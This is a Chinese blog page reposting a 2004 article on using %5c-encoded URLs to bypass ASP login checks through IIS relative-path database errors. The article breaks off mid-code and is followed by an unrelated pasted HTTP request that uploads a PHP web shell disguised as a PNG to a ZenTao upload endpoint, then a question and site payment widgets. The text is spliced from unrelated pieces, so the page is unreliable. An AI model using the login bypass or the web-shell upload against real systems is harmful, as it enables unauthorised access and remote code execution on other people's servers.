利用%5c绕过验证

本文探讨了如何利用%5c字符绕过ASP的验证过程,通过分析包含%5c的URL如何影响IIS和数据库连接,揭示了一个可能的安全漏洞。当提交包含%5c的URL时,可能导致数据库文件无法找到,从而利用容错机制绕过验证。作者通过实例展示了如何修改登录页面的URL并使用空格作为用户名和密码,以绕过某些系统的验证。文章还提到了成功利用此方法的条件,包括相对路径的数据库连接、简单的错误处理、特定的IIS版本和程序对空字符的处理。最后,作者提出了相应的防范措施。

利用%5c绕过验证

---------------------------------------
lake2(http://mrhupo.126.com)
2004-11-27
---------------------------------------

说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。

好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是/的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<!--#INCLUDE file="conn.asp" --&g

POST /file-ajaxUpload-6895631d018d8.html?dir=image HTTP/1.1 Host: 10.10.10.10 Content-Length: 341 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY5wFSk8xBmgB03g1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://10.10.10.10/product-create-6.html Accept-Encoding: gzip, deflate, br Cookie: lang=zh-cn; device=desktop; theme=default; zentaosid=9f7d62118a2704cbf034cd5446527d2e; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; lastProject=7; lastProgram=6; preProductID=4; storyModule=0; storyBranch=all; treeBranch=all; productStoryOrder=id_desc; branchSourceName=%E6%89%80%E5%B1%9E; branchName=; lastStoryModule=0; lastTaskModule=2; preBranch=0; windowWidth=1504; windowHeight=1130; tab=product; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fexecution-task.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fcompany-browse.html%22%2C%22program%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fprogram-browse.html%22%2C%22product%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fproduct-all.html%22%7D Connection: keep-alive ------WebKitFormBoundaryY5wFSk8xBmgB03g1 Content-Disposition: form-data; name="localUrl" C:\fakepath\shell1.php.png ------WebKitFormBoundaryY5wFSk8xBmgB03g1 Content-Disposition: form-data; name="imgFile"; filename="shell1.php.png" Content-Type: image/png <?php eval($_POST["pass"]); ------WebKitFormBoundaryY5wFSk8xBmgB03g1-- 如何在这个上面构建index。php
最新发布
08-09
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值